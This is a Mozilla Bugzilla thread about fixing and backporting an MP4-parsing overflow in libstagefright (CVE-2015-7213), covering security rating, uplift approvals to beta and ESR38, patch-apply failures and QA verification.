We need a security rating on this issue. This looks like an exploitable crash from an overflow. Is that right? Am I correct in reading that we are *only* wanting this bug on ESR38, despite screw ups of checkins? :-)
Flags: needinfo?(jyavenard)
Updated•9 years ago
Group: core-security → media-core-security
https://hg.mozilla.org/mozilla-central/rev/680e1f669ea5
https://hg.mozilla.org/mozilla-central/rev/708cf76b6cb4
Status: NEW → RESOLVED
Closed: 9 years ago
status-firefox44:
--- → fixed
Resolution: --- → FIXED
Target Milestone: --- → mozilla44
Assignee
Comment 21•9 years ago
(In reply to Al Billings [:abillings] from comment #19)
> We need a security rating on this issue. This looks like an exploitable
> crash from an overflow. Is that right?

Hard to tell really. Just as severe as all the other stagefright overflows. Probably more so because it's very easy to control what is going to be copied, as the code simply replicates the content of the mp4 atoms.

> Am I correct in reading that we are *only* wanting this bug on ESR38,
> despite screw ups of checkins? :-)

Yes, only for ESR38.
Flags: needinfo?(jyavenard)
Comment 22•9 years ago
Comment on attachment 8665247 [details] [diff] [review] P1. Ensure operation can't overflow. sec-approval+. Can you nominate for ESR38?
Attachment #8665247 -
Flags: sec-approval? → sec-approval+
Updated•9 years ago
Group: media-core-security → core-security-release
Reporter
Comment 23•9 years ago
Since libstagefright is a Google lib (I think!), I have reported this bug also at https://code.google.com/p/chromium/issues/detail?id=539372 .
Comment 24•9 years ago
This was supposed to have landed in the ESR release, let's not miss this one too.
status-firefox-esr38:
--- → affected
tracking-firefox-esr38:
--- → 43+
Comment 25•9 years ago
ni? just to make sure releng is tracking this bug
Flags: needinfo?(rkothari)
Just a rebase for ESR-38.
Attachment #8694544 -
Flags: review+
Just a rebase for ESR-38.
Attachment #8694545 -
Flags: review+
As this bug is needed before bug 1216748, I've checked the patches for landing on Beta-43 (the original patches just work) and ESR-38 (new patches submitted above). Note that they are already in Aurora-44, so no need to uplift them there.
Blocks: CVE-2015-7222
Gerald, could you please nominate the ESR38 patch for uplift?
Flags: needinfo?(rkothari) → needinfo?(gsquelart)
Comment on attachment 8694544 [details] [diff] [review]
Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch

[Approval Request Comment]
If this is not a sec:{high,crit} bug, please state case for ESR consideration: It is sec-high.
User impact if declined: Potential OOMs, crashes with bad MP4 files.
Fix Landed on Version: 44
Risk to taking this patch (and alternatives if risky): Very little, it's only added checks with parsing bailouts.
String or UUID changes made by this patch: None.
Attachment #8694544 -
Flags: approval-mozilla-esr38?
Comment on attachment 8694545 [details] [diff] [review]
Bug-1206211-P2-Abort-on-OOM-rkentuckyfriedtakahe-ESR38.patch

[Approval Request Comment]
If this is not a sec:{high,crit} bug, please state case for ESR consideration: It is sec-high.
User impact if declined: Potential OOMs, crashes with bad MP4 files.
Fix Landed on Version: 44
Risk to taking this patch (and alternatives if risky): Very little, it's only added checks with parsing bailouts.
String or UUID changes made by this patch: None.
Flags: needinfo?(gsquelart)
Attachment #8694545 -
Flags: approval-mozilla-esr38?
Comment 32•9 years ago
Gerald does this need uplift to beta as well? Which patches? Thanks.
Flags: needinfo?(gsquelart)
Comment 33•9 years ago
Comment on attachment 8694544 [details] [diff] [review] Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch Please uplift to beta, avoids crash from corrupt mp3 files.
Attachment #8694544 -
Flags: approval-mozilla-esr38? → approval-mozilla-esr38+
Comment 34•9 years ago
Comment on attachment 8694545 [details] [diff] [review] Bug-1206211-P2-Abort-on-OOM-rkentuckyfriedtakahe-ESR38.patch This should also uplift to beta to avoid OOM crashes from mpeg4.
Attachment #8694545 -
Flags: approval-mozilla-esr38? → approval-mozilla-esr38+
Comment 35•9 years ago
Marking this as affected for 43 and accepting beta uplifts since I talked with Gerald on irc.
status-firefox43:
--- → affected
tracking-firefox43:
--- → +
tracking-firefox44:
--- → +
Flags: needinfo?(gsquelart)
Comment 36•9 years ago
Comment on attachment 8694545 [details] [diff] [review] Bug-1206211-P2-Abort-on-OOM-rkentuckyfriedtakahe-ESR38.patch Re-setting esr flag for sylvestre to handle, as I meant to set the approval for beta!
Attachment #8694545 -
Flags: approval-mozilla-esr38?
Attachment #8694545 -
Flags: approval-mozilla-esr38+
Attachment #8694545 -
Flags: approval-mozilla-beta+
Comment 37•9 years ago
Comment on attachment 8694544 [details] [diff] [review] Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch Fixing this to be an approval for beta, not esr.
Attachment #8694544 -
Flags: approval-mozilla-esr38?
Attachment #8694544 -
Flags: approval-mozilla-esr38+
Attachment #8694544 -
Flags: approval-mozilla-beta+
Comment 38•9 years ago
this failed to apply to beta and aurora with:

adding 1206211-P1-beta.patch to series file
applying 1206211-P1-beta.patch
patching file media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp
Hunk #1 FAILED at 502
1 out of 1 hunks FAILED -- saving rejects to file media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp.rej
patch failed, unable to continue (try -v)
patch failed, rejects left in working directory

could you take a look? Thanks!
Flags: needinfo?(jyavenard)
Working on it and bug 1216748.
Flags: needinfo?(jyavenard)
Attachment #8694544 -
Flags: approval-mozilla-beta+
Attachment #8694545 -
Flags: approval-mozilla-beta+
Comment on attachment 8665247 [details] [diff] [review] P1. Ensure operation can't overflow. (Requesting beta on the correct patches)
Attachment #8665247 -
Flags: approval-mozilla-beta?
Comment on attachment 8665248 [details] [diff] [review] P2. Abort on OOM. (Requesting beta on the correct patches)
Attachment #8665248 -
Flags: approval-mozilla-beta?
Comment 42•9 years ago
Comment on attachment 8665247 [details] [diff] [review] P1. Ensure operation can't overflow. Please uplift this patch to beta. My mistake!
Attachment #8665247 -
Flags: approval-mozilla-beta? → approval-mozilla-beta+
Comment 43•9 years ago
Comment on attachment 8665248 [details] [diff] [review] P2. Abort on OOM. This should uplift to beta, I had the wrong patch in the last request.
Attachment #8665248 -
Flags: approval-mozilla-beta? → approval-mozilla-beta+
(In reply to Carsten Book [:Tomcat] from comment #38)
> this failed to apply to beta and aurora [...]

Beta should now work, with the correct patches. But please don't try and uplift them to aurora, as they're already there.
https://hg.mozilla.org/releases/mozilla-beta/rev/3a00ac7ecacb
https://hg.mozilla.org/releases/mozilla-beta/rev/c288fafdfb4f
Comment 46•9 years ago
Another ESR38 affected sec-high that hasn't been approved and checked in...
Flags: needinfo?(sledru)
Flags: needinfo?(lhenry)
Updated•9 years ago
Whiteboard: [adv-main43+]
Comment 47•9 years ago
Comment on attachment 8694545 [details] [diff] [review] Bug-1206211-P2-Abort-on-OOM-rkentuckyfriedtakahe-ESR38.patch taking it too in esr.
Flags: needinfo?(sledru)
Flags: needinfo?(lhenry)
Attachment #8694545 -
Flags: approval-mozilla-esr38? → approval-mozilla-esr38+
Comment 48•9 years ago
failed to apply to esr:

patching file media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp
Hunk #1 FAILED at 511
1 out of 1 hunks FAILED -- saving rejects to file media/libstagefright/frameworks/av/media/libstagefright/MPEG4Extractor.cpp.rej
patch failed, unable to continue (try -v)
patch failed, rejects left in working directory
errors during apply, please fix and qrefresh 1206211.patch
Flags: needinfo?(jyavenard)
Sylvestre, you left Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch as "esr38?", could you please approve it? (Or is it implied by the approval of the 2nd patch?)

Carsten, to be sure: Did you try and commit both *-ESR38.patch files? I've tried locally and they just worked.
Flags: needinfo?(jyavenard) → needinfo?(sledru)
(In reply to Gerald Squelart [:gerald] from comment #49)
> Carsten, to be sure: Did you try and commit both *-ESR38.patch files? I've
> tried locally and they just worked.

Also, once these patches land, please check-in bug 1216748 patches (all those with esr38+). Thank you!
Please contact me if you're still having troubles.
Flags: needinfo?(cbook)
Comment 51•9 years ago
Comment on attachment 8694544 [details] [diff] [review] Bug-1206211-P1-Ensure-operation-cant-overflow-rken-ESR38.patch This was a typo, sorry
Flags: needinfo?(sledru)
Attachment #8694544 -
Flags: approval-mozilla-esr38? → approval-mozilla-esr38+
Updated•9 years ago
Keywords: checkin-needed
Comment 52•9 years ago
(In reply to Gerald Squelart [:gerald] from comment #50)
> (In reply to Gerald Squelart [:gerald] from comment #49)
> > Carsten, to be sure: Did you try and commit both *-ESR38.patch files? I've
> > tried locally and they just worked.
>
> Also, once these patches land, please check-in bug 1216748 patches (all
> those with esr38+). Thank you!
> Please contact me if you're still having troubles.

Oh sorry, missed that 2nd patch when I tried first, but now with the 2nd patch and approval :) all is good and landed as

https://hg.mozilla.org/releases/mozilla-esr38/rev/f710e2e351b9
https://hg.mozilla.org/releases/mozilla-esr38/rev/75343b2f90f4
Flags: needinfo?(cbook)
Updated•9 years ago
Keywords: checkin-needed
Updated•9 years ago
Alias: CVE-2015-7213
Whiteboard: [adv-main43+] → [adv-main43+][adv-esr38.5+]
Comment 53•9 years ago
Reproduced this issue on Windows 10 x64 with Firefox 40 beta 8, using the attached poc. Confirming the fix for:
* 44 beta 9, build ID: 20160114165817
* 43.0.3, build ID: 20151223140742
* latest 38.5.2esr tinderbox, build ID: 20160114062730
Status: RESOLVED → VERIFIED
QA Contact: cornel.ionce
Updated•8 years ago
Group: core-security-release
Updated•4 months ago
Keywords: reporter-external